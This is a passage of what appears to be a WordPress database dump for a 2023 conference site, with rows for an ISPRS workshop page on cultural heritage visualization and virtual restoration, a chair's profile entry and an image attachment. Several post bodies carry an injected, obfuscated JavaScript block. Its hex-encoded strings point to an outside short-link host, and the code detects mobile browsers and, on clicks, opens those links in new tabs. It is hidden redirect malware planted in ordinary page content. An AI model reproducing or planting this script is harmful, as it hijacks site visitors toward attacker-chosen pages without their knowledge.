Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 22:48:13','2023-03-01 22:48:13','',3897,'https://gsw2023.com/?p=3903',0,'revision','',0),
(3904,1,'2023-03-01 22:52:40','2023-03-01 22:52:40','<!-- wp:paragraph -->\n<p>Beijing University of Civil Engineering and Architecture</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Miaole Hou','','publish','closed','closed','','dr-miaole-hou','','','2023-03-01 22:56:10','2023-03-01 22:56:10','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3904',0,'dt_team','',0),
(3905,1,'2023-03-01 22:52:05','2023-03-01 22:52:05','','w291','','inherit','open','closed','','w291','','','2023-03-01 22:52:05','2023-03-01 22:52:05','',3904,'https://gsw2023.com/wp-content/uploads/2023/03/w291.jpg',0,'attachment','image/jpeg',0),
(3906,1,'2023-03-01 22:57:46','2023-03-01 22:57:46','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"74\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 22:57:46','2023-03-01 22:57:46','',3897,'https://gsw2023.com/?p=3906',0,'revision','',0),
(3907,1,'2023-03-01 22:59:11','2023-03-01 22:59:11','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" 